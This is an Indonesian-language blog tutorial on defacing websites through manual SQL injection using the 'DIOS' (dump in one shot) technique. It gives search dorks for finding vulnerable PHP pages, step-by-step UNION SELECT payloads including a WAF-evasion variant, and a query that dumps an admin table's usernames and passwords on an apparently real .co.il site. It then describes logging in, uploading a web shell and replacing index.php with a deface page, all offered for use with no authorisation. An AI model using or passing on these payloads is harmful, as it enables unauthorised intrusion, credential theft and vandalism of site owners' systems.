1. Beranda
  2. Blog
  3. Cara Deface Metode DIOS

Cara Deface Metode DIOS

12 Apr
12Apr



apa itu DIOS ? ( dump in one shoot ) 

Dios adalah otomatisasi untuk melakukan dump tabel dan kolom saat melakukan sql injection manual.

cara nya ?kalian bisa menggunakan hackbar ( addons firefox ) dan (addons google) yang sudah dimodifikasi atau biasa disebut "advanced hackbar


Download Google Hackbar disini


download Hackbar Mozila disini


dork tinggal cari atau copy di bwh


about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=


sisanya ada di sini

dork special di sini


yuk pentest


www.situs.co.il/advertiser_view.php?id=77
step awlanya untuk mengetahui vuln atau tidaknya kalian besa memberikan tanda petik di akhir angka seperti ini

www.situs.co.il/advertiser_view.php?id=77'



ciri-ciri vuln tidak harus nongol tulisan eror.
bisa saja ada kata yg hilang,gambar ato sebagaianya,


untuk lankah pertama kita gunakan

order+by+1--+
order+by+2--+
order+by+3--+
dan seterus nya ampe error

Lanjut kita bermain dengan order+by+1-- dan seterusnya sampai menemukan pesan error.

Disini w mendapatkan errornya di angka order+by+10-- berarti jumlah columnnya ada 9. 

Ditarget w ga ada error mysql blablabla atau error sqli yang lainnya, tapi disini errornya datanya hilang atau artikelnya kosong di bagian bawah about.(lihat gambar diatas)

Oke lanjut ketutorial berikutnya, masukan union select.
Selengkapnya seperti ini,

union+select+1,2,3,4 dst--+ 


www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,9-- 

Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka magicknya atau biasa menyebutnya dengan angka ajaib
Kalo ditutorial kemarin kita harus memasukan group_concat dll kali ini enggak, tinggal kita masukan code DIOS nya saja.
Disini w milih angka 9 aja dan berikut ini code DIOS nya, 


make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) 


(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))


untuk WAF:

(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

Untuk perintah lengkapnya kek gini guys


www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)-- 

Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.

Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini target gw nama column admin nya adalah admin dan untuk nama tablenya adalah USER_NAME dan PASSWORD bisa lihat digambar bawah ini, 

Berarti kita perintahnya untuk memasukan ke code dios nya jadi gini,

www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

atau bisa juga seperti ini


www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,concat(,USER_NAME,0x3a,PASSWORD)+from+admin--+


Dan bummmm lihat(gambar diatas), Ternyata kita berhasil ngedump username dan passwordnya.

Setelah itu tinggal cari tempat admin loginya, tapi disini gw udah tau tempat admin loginya jadi tinggal login.

Sekarang cari tempat buat upload shell, lihat gambar dibawah ini, 


Setelah menemukan tempat buat upload shell, sekarang saatnya upload shell kalian.
Kalo belum punya shell kalian bisa cari dipostingan gw ada kok.
Dan disini gw udah berhasil uploadnya, liat gambar dibawah ini,

Sekarang tinggal paste url shell tadi dibrowser dan enter, nanti shell kalian bakalan muncul. 

Nah step terakhir, cari directory publick_html dan upload script deface kalian disitu dengan extensi index.php ini untuk ngedeface halaman utama website.

Kalo hanya mau nitip file saja, kalian upload script deface selain index.php bisa dengan nama test.php, test.html, dll sesuai keinginan kalian aja.



ok sekian terimakasih,

11Apr
Cara Deface Metode Sqlmap
12Apr
Kumpulan Web Vuln Sql
12Apr
Pengenalan TERMUX
I BUILT MY SITE FOR FREE USING